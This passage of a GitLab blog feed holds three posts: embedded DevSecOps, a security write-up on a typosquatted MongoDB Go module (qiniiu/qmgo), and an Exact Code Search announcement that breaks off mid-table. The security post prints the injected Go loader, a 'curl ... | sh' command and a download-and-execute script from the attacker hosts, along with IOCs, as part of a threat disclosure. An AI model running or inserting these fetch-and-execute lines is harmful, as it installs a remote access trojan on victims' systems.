        <content type="html"><![CDATA[<p>For embedded systems teams, DevSecOps has traditionally seemed like an approach better suited to SaaS applications than firmware development. But this is changing. Software is now a primary differentiator in hardware products. New market expectations demand modern development practices. In response, organizations are pursuing &quot;embedded DevSecOps.&quot;</p>
<p>What is embedded DevSecOps? The application of collaborative engineering practices, integrated toolchains, and automation for building, testing, and securing software to embedded systems development. Embedded DevSecOps includes necessary adaptations for hardware integration.</p>
<h2>Convergence of market forces</h2>
<p>Three powerful market forces are converging to compel embedded teams to modernize their development practices.</p>
<h3>1. The software-defined product revolution</h3>
<p>Products once defined primarily by their hardware are now differentiated by their software capabilities. The software-defined vehicle (SDV) market tells a compelling story in this regard. It's projected to grow from $213.5 billion in 2024 to <a href="https://www.marketsandmarkets.com/Market-Reports/software-defined-vehicles-market-187205966.html">$1.24 trillion</a> by 2030, a massive 34% compound annual growth rate.
The software content in these products is growing considerably. By the end of 2025, the average vehicle is expected to contain <a href="https://www.statista.com/statistics/1370978/automotive-software-average-lines-of-codes-per-vehicle-globally/">650 million lines of code</a>. Traditional embedded development approaches cannot handle this level of software complexity.</p>
<h3>2. Hardware virtualization as a technical enabler</h3>
<p>Hardware virtualization is a key technical enabler of embedded DevSecOps. Virtual electronic control units (vECUs), cloud-based ARM CPUs, and sophisticated simulation environments are becoming more prevalent. Virtual hardware allows testing that once required physical hardware.</p>
<p>These virtualization technologies provide a foundation for continuous integration (<a href="https://about.gitlab.com/topics/ci-cd/">CI</a>). But their value is fully realized only when integrated into an automated workflow. Combined with collaborative development practices and automated pipelines, virtual testing helps teams detect issues much earlier, when fixes are far less expensive. Without embedded DevSecOps practices and tooling to orchestrate these virtual resources, organizations can't capitalize on the virtualization trend.</p>
<h3>3. The competitive and economic reality</h3>
<p>Three interrelated forces are reshaping the competitive landscape for embedded development:</p>
<ul>
<li>The talent war has shifted decisively. As an embedded systems leader at a GitLab customer explained, “No embedded engineers graduating from college today know legacy tools like Perforce. They know Git. These young engineers will work at a company for six months on legacy tools, then quit.” Companies using outdated tools may lose their engineering future.</li>
<li>This talent advantage translates into competitive superiority. Tech-forward companies that attract top engineers with modern practices achieve remarkable results. For example, in 2024, <a href="https://spacenews.com/spacex-launch-surge-helps-set-new-global-launch-record-in-2024/">SpaceX</a> performed more orbital launches than the rest of the world combined. Tech-forward companies excel at software development and embrace a modern development culture. This, among other things, creates efficiencies that legacy companies struggle to match.</li>
<li>The rising costs of embedded development — driven by long feedback cycles — create an urgent need for embedded DevSecOps. When developers have to wait weeks to test code on hardware test benches, productivity remains inherently low. Engineers lose context and must switch contexts when results arrive. The problem worsens when defects enter the picture. Bugs become more expensive to fix the later they're discovered. Long feedback cycles magnify this problem in embedded systems.</li>
</ul>
<p>Organizations are adopting embedded DevSecOps to help combat these challenges.</p>
<h2>Priority transformation areas</h2>
<p>Based on these market forces, forward-thinking embedded systems leaders are implementing embedded DevSecOps in the following ways.</p>
<h3>From hardware bottlenecks to continuous testing</h3>
<p>Hardware-testing bottlenecks represent one of the most significant constraints in traditional embedded development. These delays create the unfavorable economics described earlier — when developers wait weeks for hardware access, defect costs spiral.
Addressing this challenge requires a multifaceted approach including:</p>
<ul>
<li>Automating the orchestration of expensive shared hardware test benches among embedded developers</li>
<li>Integrating both SIL (Software-in-the-Loop) and HIL (Hardware-in-the-Loop) testing into automated CI pipelines</li>
<li>Standardizing builds with version-controlled environments</li>
</ul>
<p>Embedded developers can accomplish this with GitLab's <a href="https://gitlab.com/gitlab-accelerates-embedded/comp/device-cloud">On-Premises Device Cloud</a>, a CI/CD component. Through automating the orchestration of firmware tests on virtual and real hardware, teams are better positioned to reduce feedback cycles from weeks to hours. They also can catch more bugs early on in the software development lifecycle.</p>
<h3>Automating compliance and security governance</h3>
<p>Embedded systems face strict regulatory requirements. Manual compliance processes are unsustainable.
Leading organizations are transforming how they comply with these requirements by:</p>
<ul>
<li>Replacing manual workflows with automated <a href="https://about.gitlab.com/blog/introducing-custom-compliance-frameworks-in-gitlab/">compliance frameworks</a></li>
<li>Integrating specialized functional safety, security, and code quality tools into automated continuous integration pipelines</li>
<li>Automating approval workflows, enforcing code reviews, and maintaining audit trails</li>
<li>Configuring compliance frameworks for specific standards like ISO 26262 or DO-178C</li>
</ul>
<p>This approach enables greater compliance maturity without additional headcount — turning what was once a burden into a competitive advantage. One leading electric vehicle (EV) manufacturer executes 120,000 CI/CD jobs per day with GitLab, many of which include compliance checks. And they can fix and deploy bug fixes to vehicles within an hour of discovery. This level of scale and speed would be extremely difficult without automated compliance workflows.</p>
<h3>Enabling collaborative innovation</h3>
<p>Historically, for valid business and technical reasons, embedded developers have largely worked alone at their desks. Collaboration has been limited. Innovative organizations break down these barriers by enabling shared code visibility through integrated source control and CI/CD workflows. These modern practices attract and retain engineers while unlocking innovation that would remain hidden in isolated workflows.
As one director of DevOps at a tech-forward automotive manufacturer (a GitLab customer) explains: &quot;It's really critical for us to have a single pane of glass that we can look at and see the statuses. The developers, when they bring a merge request, are aware of the status of a given workflow in order to move as fast as possible.&quot; This transparency accelerates innovation, enabling automakers to rapidly iterate on software features that differentiate their vehicles in an increasingly competitive market.</p>
<h2>The window of opportunity</h2>
<p>Embedded systems leaders have a clear window of opportunity to gain a competitive advantage through DevSecOps adoption. But the window won't stay open forever. Software continues to become the primary differentiator in embedded products, and the gap between leaders and laggards will only widen.
Organizations that successfully adopt DevSecOps will reduce costs, accelerate time-to-market, and unlock innovation that differentiates them in the market. The embedded systems leaders of tomorrow are the ones embracing DevSecOps today.</p>
<blockquote>
<p>While this article explored why now is the critical time for embedded teams to adopt DevSecOps, you may be wondering about the practical steps to get started. Learn how to put these concepts into action with our guide: <a href="https://about.gitlab.com/blog/4-ways-to-accelerate-embedded-development-with-gitlab/">4 ways to accelerate embedded development with GitLab</a>.</p>
</blockquote>
]]></content>
        <author>
            <name>Matt DeLaney</name>
            <uri>https://about.gitlab.com/blog/authors/matt-delaney</uri>
        </author>
        <published>2025-07-01T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[GitLab catches MongoDB Go module supply chain attack]]></title>
        <id>https://about.gitlab.com/blog/gitlab-catches-mongodb-go-module-supply-chain-attack/</id>
        <link href="https://about.gitlab.com/blog/gitlab-catches-mongodb-go-module-supply-chain-attack/"/>
        <updated>2025-06-30T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p>Software supply chain attacks via malicious dependencies continue to be one of the most significant security threats to modern software development. The widespread use of open source components has enabled development teams to build applications rapidly, but it has also widened the attack surface area. The growing ecosystem of third-party packages presents numerous opportunities for attackers to exploit dependencies through techniques like typosquatting, dependency confusion, and package impersonation, making it increasingly challenging for developers to distinguish legitimate packages from malicious imposters.</p>
<p>To address this challenge, GitLab's Vulnerability Research team recently developed an automated detection system designed to proactively identify malicious dependencies in software supply chains. The system combines multiple detection techniques that work in concert:</p>
<ul>
<li>Automated typosquatting detection, which identifies suspicious naming patterns</li>
<li>Semantic code analysis, which flags potentially malicious behaviors like network requests or command executions</li>
<li>AI-assisted initial screening for advanced payload and obfuscation detection</li>
</ul>
<p>This multi-layered approach is used by the vulnerability research team to continuously scan newly published dependencies across major ecosystems, providing early warning of supply chain attacks.</p>
<p>Using this detection system, GitLab recently identified a live typosquatting attack in the wild that leveraged a malicious MongoDB Go module. Below are details on the attack and how GitLab works to keep supply chains safe.</p>
<h2>Executive summary: A MongoDB module that's not quite right</h2>
<p>Our detection system flagged a newly published Go module called <code>github.com/qiniiu/qmgo</code>, closely mimicking the popular <a href="https://www.mongodb.com/">MongoDB</a> module <code>github.com/qiniu/qmgo</code>. The legitimate module describes itself as &quot;The Go driver for MongoDB&quot; and has gained traction in the Go community.</p>
<p>To disguise the malicious module as legitimate, the threat actor used a GitHub username nearly identical to the one associated with the real module with one subtle change: they added one “i” (<code>qiniu</code> → <code>qiniiu</code>). To the casual observer scrolling through search results or auto-complete suggestions, this difference would be very easy to overlook.</p>
<p>The new module’s code was a working copy of the legitimate <code>qmgo</code> module. However, malicious code was inserted into the <code>NewClient</code> function in <code>client.go</code>, a function that developers would naturally call when initializing their MongoDB connection. Concealing malicious code within a function made the payload less likely to be executed during potential runtime security analysis, while ensuring that it would execute from normal usage in real applications.</p>
<p>After reporting the malicious module, it was removed within approximately 19 hours of our initial report. However, the threat actor quickly adapted, publishing a second typosquatted version (<code>github.com/qiiniu/qmgo</code>) just four days later with identical malicious code. This follow-up attack was also detected and taken down roughly one hour after initial discovery. The rapid redeployment demonstrates the persistent nature of these attacks and highlights why proactive detection is crucial in minimizing exposure windows.</p>
<h2>Technical deep dive: Peeling back the layers</h2>
<p>The threat actor took steps to hide the attack. The malicious payload used a multilayered approach, starting with a compact code snippet that triggered a chain of remote payload downloads:</p>
<pre><code class="language-go">txt, err := script.Get(&quot;https://raw.githubusercontent.com/qiiniu/vue-element-admin/refs/heads/main/public/update.html&quot;).String()  
if err == nil {  
    txt2, err := script.Get(string(strings.Replace(txt, &quot;\n&quot;, &quot;&quot;, -1))).String()  
    if err == nil {  
        exec.Command(&quot;/bin/sh&quot;, &quot;-c&quot;, string(txt2)).Start()  
    }  
}  
</code></pre>
<p>The attack unfolds in four distinct layers:</p>
<p><strong>Layer 1:</strong> The code fetches <code>update.html</code> from another repository owned by the typosquat account <code>qiiniu/vue-element-admin</code>. The file contained a single line:</p>
<pre><code>https://img.googlex.cloud/seed.php
</code></pre>
<p><strong>Layer 2:</strong> The code then fetches <code>https://img.googlex.cloud/seed.php</code>, which returns a single shell command, which is executed:</p>
<pre><code class="language-bash">curl -s http://207.148.110.29:80/logon61.gif|sh
</code></pre>
<p><strong>Layer 3:</strong> The command tells the system to fetch <code>http://207.148.110.29:80/logon61.gif</code> using curl and execute the response as a shell script.  The shell script downloads what appears to be an MP3 file (<code>chainelli.mp3</code>) to <code>/tmp/vod</code>, makes it executable, runs it, and immediately deletes it:</p>
<pre><code class="language-bash">#!/bin/sh  
rm -rf /tmp/vod  
curl -s http://207.148.110.29:80/chainelli.mp3 -o /tmp/vod  
chmod 777 /tmp/vod  
/tmp/vod  
rm -rf /tmp/vod  
</code></pre>
<p><strong>Layer 4:</strong> The <code>chainelli.mp3</code> file is actually a statically-linked, stripped ELF Go binary designed to establish persistent remote access. Once executed, the malware attempts to connect to its command and control server at <code>ellipal.spoolsv.cyou</code> on Port 443 (both TCP and UDP), using a custom encrypted communication protocol with a hardcoded RSA key. From there, it provides the threat actor with remote administration capabilities:</p>
<ul>
<li>Complete remote shell access and one-off command execution</li>
<li>Screenshot captures</li>
<li>SOCKS proxy functionality to make connections through the compromised machine</li>
<li>Configurable sleep interval between check-ins with the command and control server to avoid detection</li>
<li>Standard remote access trojan features like filesystem browsing and upload/download</li>
</ul>
<h2>They're back (already)</h2>
<p>Just four days after GitLab reported the initial malicious module and saw it removed, <code>github.com/qiiniu/qmgo</code> appeared – the second typosquatted version with identical malicious code. This quick redeployment demonstrates the persistent nature of these attacks and highlights how threat actors adapt quickly to takedown efforts.</p>
<h2>GitLab’s approach: Finding needles in haystacks</h2>
<p>The initial discovery and persistence of this attack validated our approach to proactive dependency monitoring and threat detection. GitLab’s detection system combines multiple techniques to identify malicious dependencies:</p>
<p><strong>Typosquatting detection:</strong> GitLab monitors newly published dependencies and looks for packages that exhibit signs of various typosquatting strategies.</p>
<p><strong>Semantic heuristics:</strong> Our system statically analyzes code for patterns like network requests, command executions, and other behaviors typical of malicious payloads.</p>
<p><strong>AI-assisted analysis:</strong> A <a href="https://about.gitlab.com/blog/what-is-a-large-language-model-llm/">large language model</a> does the initial analysis of the suspicious parts of the code to help us weed out obvious false positives, detect complex payloads, and identify obfuscation techniques used to hide malicious intent.</p>
<p><strong>Human review:</strong> A human receives an alert to verify the finding and to perform advanced analysis.</p>
<h2>Recommendations: Staying ahead of persistent supply chain threats</h2>
<p>This attack highlights the ongoing challenges in securing software supply chains. The multilayered obfuscation and rapid redeployment after takedown demonstrate that threat actors are willing to invest significant effort in targeting popular dependencies.</p>
<p>The quick pivot to new typosquatted packages after our initial report highlights a fundamental weakness in the current ecosystems: package managers typically only remove malicious dependencies after they've been published, discovered, and reported by the community. This reactive approach leaves a dangerous window where developers can unknowingly consume compromised packages. Proactive monitoring and detection systems like the one GitLab has developed can help close this gap by identifying threats during the publication process itself.</p>
<p>We've provided indicators of compromise (IOCs) in the next section, which you can use in your monitoring systems to detect this specific campaign.</p>
<h2>Indicators of compromise</h2>
<table>
<thead>
<tr>
<th style="text-align:left">IOC</th>
<th style="text-align:left">Description</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:left"><code>github.com/qiniiu/qmgo</code></td>
<td style="text-align:left">Malicious Go module</td>
</tr>
<tr>
<td style="text-align:left"><code>github.com/qiiniu/qmgo</code></td>
<td style="text-align:left">Malicious Go module</td>
</tr>
<tr>
<td style="text-align:left"><code>https://raw.githubusercontent.com/qiniiu/vue-element-admin/refs/heads/main/public/update.html</code></td>
<td style="text-align:left">Payload delivery URL</td>
</tr>
<tr>
<td style="text-align:left"><code>https://raw.githubusercontent.com/qiiniu/vue-element-admin/refs/heads/main/public/update.html</code></td>
<td style="text-align:left">Payload delivery URL</td>
</tr>
<tr>
<td style="text-align:left"><code>https://img.googlex.cloud/seed.php</code></td>
<td style="text-align:left">Payload delivery URL</td>
</tr>
<tr>
<td style="text-align:left"><code>http://207.148.110.29:80/logon61.gif</code></td>
<td style="text-align:left">Payload delivery URL</td>
</tr>
<tr>
<td style="text-align:left"><code>http://207.148.110.29:80/chainelli.mp3</code></td>
<td style="text-align:left">Payload delivery URL</td>
</tr>
<tr>
<td style="text-align:left"><code>img.googlex.cloud</code></td>
<td style="text-align:left">Payload delivery host</td>
</tr>
<tr>
<td style="text-align:left"><code>207.148.110.29</code></td>
<td style="text-align:left">Payload delivery host</td>
</tr>
<tr>
<td style="text-align:left"><code>ellipal.spoolsv.cyou</code></td>
<td style="text-align:left">Command &amp; Control host</td>
</tr>
<tr>
<td style="text-align:left"><code>6ada952c592f286692c59028c5e0fc3fa589759f</code></td>
<td style="text-align:left">SHA-1 checksum of chainelli.mp3 remote administration malware</td>
</tr>
<tr>
<td style="text-align:left"><code>8ae533e2d1d89c871908cbcf5c7d89c433d09b2e7f7d4ade3aef46c55b66509c</code></td>
<td style="text-align:left">SHA-256 checksum of chainelli.mp3 remote administration malware</td>
</tr>
<tr>
<td style="text-align:left"><code>/tmp/vod</code></td>
<td style="text-align:left">Temporary download location of chainelli.mp3 remote administration malware</td>
</tr>
</tbody>
</table>
<h2>How GitLab helps secure the software supply chain</h2>
<p>Malicious dependencies, like the MongoDB Go module attack, highlight why securing the software supply chain requires more than just CVE monitoring. GitLab’s DevSecOps platform includes <a href="https://docs.gitlab.com/user/application_security/secure_your_application/">Application Security Testing</a> scanners like Software Composition Analysis in the development lifecycle, helping teams catch vulnerable or malicious packages before they reach production.</p>
<p>Paired with research efforts like this, GitLab aims to enable developers to build applications that are secure from the start without compromising on development velocity.</p>
<h2>Timeline</h2>
<ul>
<li><strong>2025-06-01T09:31:</strong> GitLab reports <code>github.com/qiniiu/qmgo</code> to Go Security</li>
<li><strong>2025-06-01T09:43:</strong> GitLab reports <code>github.com/qiniiu/qmgo</code> to GitHub</li>
<li><strong>2025-06-01T10:14:</strong> GitLab reports <code>ellipal.spoolsv.cyou</code> (<code>188.166.213.194</code>) to the IP block owner</li>
<li><strong>2025-06-02T04:03:</strong> Go Security takes down <code>github.com/qiniiu/qmgo</code></li>
<li><strong>2025-06-02T09:57:</strong> The IP block owner suspends <code>188.166.213.194</code></li>
<li><strong>2025-06-03T09:15:</strong> GitHub suspends <code>github.com/qiniiu</code></li>
<li><strong>2025-06-05T17:15:</strong> GitLab reports <code>github.com/qiiniu/qmgo</code> to Go Security</li>
<li><strong>2025-06-05T17:33:</strong> GitLab reports <code>github.com/qiiniu/qmgo</code> to GitHub</li>
<li><strong>2025-06-05T17:45:</strong> Go Security takes down <code>github.com/qiiniu/qmgo</code></li>
<li><strong>2025-06-06T12:25:</strong> GitHub suspends <code>github.com/qiiniu</code></li>
</ul>
]]></content>
        <author>
            <name>Michael Henriksen</name>
            <uri>https://about.gitlab.com/blog/authors/michael-henriksen</uri>
        </author>
        <published>2025-06-30T00:00:00.000Z</published>
    </entry>
    <entry>
        <title type="html"><![CDATA[Exact Code Search: Find code faster across repositories]]></title>
        <id>https://about.gitlab.com/blog/exact-code-search-find-code-faster-across-repositories/</id>
        <link href="https://about.gitlab.com/blog/exact-code-search-find-code-faster-across-repositories/"/>
        <updated>2025-06-25T00:00:00.000Z</updated>
        <content type="html"><![CDATA[<p><strong>TL;DR:</strong> What if you could find any line of code across 48 TB of repositories in milliseconds? GitLab's new <a href="https://docs.gitlab.com/ee/user/search/exact_code_search.html">Exact Code Search</a> makes this possible, delivering pinpoint precision, powerful regex support, and contextual multi-line results that transform how teams work with large codebases.</p>
<h2>Why traditional code search is challenging</h2>
<p>Anyone who works with code knows the frustration of searching across repositories. Whether you're a developer debugging an issue, a DevOps engineer examining configurations, a security analyst searching for vulnerabilities, a technical writer updating documentation, or a manager reviewing implementation, you know exactly what you need, but traditional search tools often fail you.</p>
<p>These conventional tools return dozens of false positives, lack the context needed to understand results, and slow to a crawl as codebases grow. The result? Valuable time spent hunting for needles in haystacks instead of building, securing, or improving your software.</p>
<p>GitLab's code search functionality has historically been backed by Elasticsearch or OpenSearch. While these are excellent for searching issues, merge requests, comments, and other data containing natural language, they weren't specifically designed for code. After <a href="https://gitlab.com/groups/gitlab-org/-/epics/7404">evaluating numerous options</a>, we developed a better solution.</p>
<h2>Introducing Exact Code Search: Three game-changing capabilities</h2>
<p>Enter GitLab's <strong><a href="https://docs.gitlab.com/ee/user/search/exact_code_search.html">Exact Code Search</a></strong>, currently in beta testing and powered by <a href="https://github.com/sourcegraph/zoekt">Zoekt</a> (pronounced &quot;zookt&quot;, Dutch for &quot;search&quot;). Zoekt is an open-source code search engine originally created by Google and now maintained by Sourcegraph, specifically designed for fast, accurate code search at scale. We've enhanced it with GitLab-specific integrations, enterprise-scale improvements, and seamless permission system integration.</p>
<p>This feature revolutionizes how you find and understand code with three key capabilities:</p>
<p><strong>1. Exact Match mode: Zero false positives</strong></p>
<p>When toggled to <strong>Exact Match mode</strong>, the search engine returns only results that match your query exactly as entered, eliminating false positives. This precision is invaluable when:</p>
<ul>
<li>Searching for specific error messages</li>
<li>Looking for particular function signatures</li>
<li>Finding instances of specific variable names</li>
</ul>
<p><strong>2. Regular Expression mode: Powerful pattern matching</strong></p>
<p>For complex search needs, Regular Expression mode allows you to craft sophisticated search patterns:</p>
<ul>
<li>Find functions following specific naming patterns</li>
<li>Locate variables matching certain constraints</li>
<li>Identify potential security vulnerabilities using pattern matching</li>
</ul>
<p><strong>3. Multiple-line matches: See code in context</strong></p>
<p><img src="https://res.cloudinary.com/about-gitlab-com/image/upload/v1750704179/ttjuilkt3v7gtyywnchx.png" alt="Exact Code Search"></p>
<p>Instead of seeing just a single line with your matching term, you get the surrounding context that's crucial for understanding the code. This eliminates the need to click through to files for basic comprehension, significantly accelerating your workflow.</p>
<h2>From features to workflows: Real-world use cases and impact</h2>
<p>Let's see how these capabilities translate to real productivity gains in everyday development scenarios:</p>
<h3>Debugging: From error message to root cause in seconds</h3>
<p>Before Exact Code Search:
Copy an error message, search, wade through dozens of partial matches in comments and documentation, click through multiple files, and eventually find the actual code.</p>
<p>With Exact Code Search:</p>
<ol>
<li>Copy the exact error message</li>
<li>Paste it into Exact Code Search with Exact Match mode</li>
<li>Instantly find the precise location where the error is thrown, with surrounding context</li>
</ol>
<p><strong>Impact:</strong> Reduce debugging time from minutes to seconds, eliminating the frustration of false positives.</p>
<h3>Code exploration: Master unfamiliar codebases quickly</h3>
<p>Before Exact Code Search:
Browse through directories, make educated guesses about file locations, open dozens of files, and slowly build a mental map of the codebase.</p>
<p>With Exact Code Search:</p>
<ul>
<li>Search for key methods or classes with Exact Match mode</li>
<li>Review multiple line matches to understand implementation details</li>
<li>Use Regular Expression mode to find similar patterns across the codebase</li>
</ul>
<p><strong>Impact:</strong> Build a mental map of code structure in minutes rather than hours, dramatically accelerating onboarding and cross-team collaboration.</p>
<h3>Refactoring with confidence</h3>
<p>Before Exact Code Search:
Attempt to find all instances of a method, miss some occurrences, and introduce bugs through incomplete refactoring.</p>
<p>With Exact Code Search:</p>
<ul>
<li>Use Exact Match mode to find all occurrences of methods or variables</li>
<li>Review context to understand usage patterns</li>
<li>Plan your refactoring with complete information about impact</li>
</ul>
<p><strong>Impact:</strong> Eliminate the &quot;missed instance&quot; bugs that often plague refactoring efforts, improving code quality and reducing rework.</p>
<h3>Security auditing: Finding vulnerable patterns</h3>
<p>Security teams can:</p>
<ul>
<li>Create regex patterns matching known vulnerable code</li>
<li>Search across all repositories in a namespace</li>
<li>Quickly identify potential security issues with context that helps assess risk</li>
</ul>
<p><strong>Impact:</strong> Transform security audits from manual, error-prone processes to systematic, comprehensive reviews.</p>
<h3>Cross-repository insights</h3>
<p>Search across your entire namespace or instance to:</p>
<ul>
<li>Identify similar implementations across different projects</li>
<li>Discover opportunities for shared libraries or standardization</li>
</ul>
<p><strong>Impact:</strong> Break down silos between projects and identify opportunities for code reuse and standardization.</p>
<h2>The technical foundation: How Zoekt delivers speed and precision</h2>
<p>Before diving into our scale achievements, let's explore what makes Zoekt fundamentally different from traditional search engines — and why it can find exact matches so incredibly fast.</p>
<h3>Positional trigrams: The secret to lightning-fast exact matches</h3>
<p>Zoekt's speed comes from its use of <strong>positional trigrams</strong> — a technique that indexes every sequence of three characters along with their exact positions in files. This approach solves one of the biggest pain points developers have had with Elasticsearch-based code search: false positives.</p>
<p>Here's how it works:</p>
<p><strong>Traditional full-text search engines</strong> like Elasticsearch tokenize code into words and lose positional information. When you search for <code>getUserId()</code>, they might return results containing <strong>user</strong>, <strong>get</strong>, and <strong>Id</strong> scattered throughout a file — leading to those frustrating false positives for GitLab users.</p>
<p><strong>Zoekt's positional trigrams</strong> maintain exact character sequences and their positions. When you search for <code>getUserId()</code>, Zoekt looks for the exact trigrams like <strong>get</strong>, <strong>etU</strong>, <strong>tUs</strong>, <strong>Use</strong>, <strong>ser</strong>, <strong>erI</strong>, <strong>rId</strong>, <strong>Id(&quot;, &quot;d()</strong>, all in the correct sequence and position. This ensures that only exact matches are returned.</p>
<p>The result? Search queries that previously returned hundreds of irrelevant results now return only the precise matches you're looking for. This was <a href="https://gitlab.com/gitlab-org/gitlab/-/issues/325234">one of our most requested features</a> for good reason - developers were losing significant time sifting through false positives.</p>
<h3>Regular expression performance at scale</h3>
<p>Zoekt excels at exact matches and is optimized for regular expression searches. The engine uses sophisticated algorithms to convert regex patterns into efficient trigram queries when possible, maintaining speed even for complex patterns across terabytes of code.</p>
<h2>Built for enterprise scale</h2>
<p>Exact Code Search is powerful and built to handle massive scale with impressive performance. This is not just a new UI feature — it's powered by a completely reimagined backend architecture.</p>
<h3>Handling terabytes of code with ease</h3>
<p>On GitLab.com alone, our Exact Code Search infrastructure indexes and searches over <strong>48 TB</strong> of code data while maintaining lightning-fast response times. This scale represents millions of repositories across thousands of namespaces, all searchable within milliseconds. To put this in perspective: This scale represents more code than the entire Linux kernel, Android, and Chromium projects combined. Yet Exact Code Search can find a specific line across this massive codebase in milliseconds.</p>
<h3>Self-registering node architecture</h3>
<p>Our innovative implementation features:</p>
<ul>
<li><strong>Automatic node registration:</strong> Zoekt nodes register themselves with GitLab</li>
<li><strong>Dynamic shard assignment:</strong> The system automatically assigns namespaces to nodes</li>
<li><strong>Health monitoring:</strong> Nodes that don't check in are automatically marked offline</li>
</ul>
<p>This self-configuring architecture dramatically simplifies scaling. When more capacity is needed, administrators can simply add more nodes without complex reconfiguration.</p>
<h3>Distributed system with intelligent load balancing</h3>
<p>Behind the scenes, Exact Code Search operates as a distributed system with these key components:</p>
<ul>
<li><strong>Specialized search nodes:</strong> Purpose-built servers that handle indexing and searching</li>
<li><strong>Smart sharding:</strong> Code is distributed across nodes based on namespaces</li>
<li><strong>Automatic load balancing:</strong> The system intelligently distributes work based on capacity</li>
<li><strong>High availability:</strong> Multiple replicas ensure continuous operation even if nodes fail</li>
</ul>
<p><em>Note: High availability is built into the architecture but not yet fully enabled. See <a href="https://gitlab.com/gitlab-org/gitlab/-/issues/514736">Issue 514736</a> for updates.</em></p>
<h3>Seamless security integration</h3>
<p>Exact Code Search automatically integrates with GitLab's permission system:</p>
<ul>
<li>Search results are filtered based on the user's access rights</li>
<li>Only code from projects the user has access to is displayed</li>
<li>Security is built into the core architecture, not added as an afterthought</li>
</ul>
<h3>Optimized performance</h3>
<ul>
<li><strong>Efficient indexing:</strong> Large repositories are indexed in tens of seconds</li>
<li><strong>Fast query execution:</strong> Most searches return results with sub-second response times</li>
<li><strong>Streaming results:</strong> The new gRPC-based federated search streams results as they're found</li>
<li><strong>Early termination:</strong> Once enough results are collected, the system pauses searching</li>
</ul>
<h2>From library to distributed system: Engineering challenges we solved</h2>
<p>While Zoekt provided the core search technology, it was originally designed as a minimal library for managing <code>.zoekt</code> index files - not a distributed database or enterprise-scale service. Here are the key engineering challenges we overcame to make it work at GitLab's scale&quot;</p>
<h3>Challenge 1: Building an orchestration layer</h3>
<p><strong>The problem:</strong> Zoekt was designed to work with local index files, not distributed across multiple nodes serving many concurrent users.</p>
<p><strong>Our solution:</strong> We built a comprehensive orchestration layer that:</p>
<ul>
<li>Creates and manages database models to track nodes, indices, repositories, and tasks</li>
<li>Implements a self-registering node architecture (inspired by GitLab Runner)</li>
<li>Handles automatic shard assignment and load balancing across nodes</li>
<li>Provides bidirectional API communication between GitLab Rails and Zoekt nodes</li>
</ul>
<h3>Challenge 2: Scaling storage and indexing</h3>
<p><strong>The problem:</strong> How do you efficiently manage terabytes of index data across multiple nodes while ensuring fast updates?</p>
<p><strong>Our solution:</strong> We implemented:</p>
<ul>
<li>Intelligent sharding: Namespaces are distributed across nodes based on capacity and load</li>
<li>Independent replication: Each node independently indexes from <a href="https://gitlab.com/gitlab-org/gitaly">Gitaly</a> (our Git storage service), eliminating complex synchronization</li>
<li>Watermark management: Sophisticated storage allocation that prevents nodes from running out of space</li>
<li>Unified binary architecture: A single <code>gitlab-zoekt</code> binary that can operate in both indexer and webserver modes</li>
</ul>
<h3>Challenge 3: Permission Integration</h3>
<p><strong>The problem:</strong> Zoekt had no concept of GitLab's complex permission system - users should only see results from projects they can access.</p>
<p><strong>Our solution:</strong> We built native permission filtering directly into the search flow:</p>
<ul>
<li>Search requests include user permission context</li>
<li>Results are filtered to include only those the user can access in case permissions change before indexing completes</li>
</ul>
<h3>Challenge 4: Operational simplicity</h3>
<p><strong>The problem:</strong> Managing a distributed search system shouldn't require a dedicated team.</p>
<p><strong>Our solution:</strong></p>
<ul>
<li>Auto-scaling: Adding capacity is as simple as deploying more nodes - they automatically register and start handling work</li>
<li>Self-healing: Nodes that don't check in are automatically marked offline and their work redistributed</li>
<li>Zero-configuration sharding: The system automatically determines optimal shard assignments</li>
</ul>
<h2>Gradual rollout: Minimizing risk at scale</h2>
<p>Rolling out a completely new search backend to millions of users required careful planning. Here's how we minimized customer impact while ensuring reliability:</p>
<h3>Phase 1: Controlled testing (gitlab-org group)</h3>
<p>We started by enabling Exact Code Search only for the <code>gitlab-org</code> group - our own internal repositories. This allowed us to:</p>
<ul>
<li>Test the system with real production workloads</li>
<li>Identify and fix performance bottlenecks</li>
<li>Streamline the deployment process</li>
<li>Learn from real users' workflows and feedback</li>
</ul>
<h3>Phase 2: Performance validation and optimization</h3>
<p>Before expanding, we focused on ensuring the system could handle GitLab.com's scale:</p>
<ul>
<li>Implemented comprehensive monitoring and alerting</li>
<li>Validated storage management with real production data growth</li>
</ul>
<h3>Phase 3: Incremental customer expansion</h3>
<p>We gradually expanded to customers interested in testing Exact Code Search:</p>
<ul>
<li>Gathered feedback on performance and user experience</li>
<li>Refined the search UI based on real user workflows</li>
<li>Optimized indexing performance (large repositories like <code>gitlab-org/gitlab</code> now index in ~10 seconds)</li>
<li>Refined the architecture based on operational learnings</li>
<li>Massively increased indexing throughput and improved state transition livecycle</li>
</ul>
<h3>Phase 4: Broad rollout</h3>
<p>Today, over 99% of Premium and Ultimate licensed groups on GitLab.com have access to Exact Code Search. Users can:</p>
<ul>
<li>Toggle between regex and exact search modes</li>
<li>Experience the benefits without any configuration changes</li>
<li>Fall back to the previous search if needed (though few choose to)</li>
</ul>
<p>Rolling this out gradually meant users didn't experience service disruptions, performance degradation, or feature gaps during the transition. We've already received positive feedback from users as they notice their results becoming more relevant and faster.</p>
<blockquote>
<p><strong>For technical deep dive:</strong> Interested in the detailed architecture and implementation? Check out our comprehensive <a href="https://handbook.gitlab.com/handbook/engineering/architecture/design-documents/code_search_with_zoekt/">design document</a> for in-depth technical details about how we built this distributed search system.</p>
</blockquote>
<h2>Getting started with Exact Code Search</h2>
<p>Getting started with Exact Code Search is simple because it's already enabled by default for Premium and Ultimate groups on GitLab.com (over 99% of eligible groups currently have access).</p>
<h3>Quickstart guide</h3>
<ol>
<li>Navigate to the Advanced Search in your GitLab project or group</li>
<li>Enter your search term in the code tab</li>
<li>Toggle between Exact Match and Regular Expression modes</li>
<li>Use filters to refine your search</li>
</ol>
<h3>Basic search syntax</h3>
<p>Whether using Exact Match or Regular Expression mode, you can refine your search with modifiers:</p>
<table>
<thead>
<tr>
<th>Query Example</th>
<th>What It Does</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>file:js</code></td>
<td>Searches only in files containing &quot;js&quot; in their name</td>
</tr>
<tr>
<td><code>foo -bar</code></td>
<td>Finds &quot;foo&quot; but excludes results with &quot;bar&quot;</td>
</tr>
<tr>
<td><code>lang:ruby</code></td>
<td>Searches only in Ruby files</td>
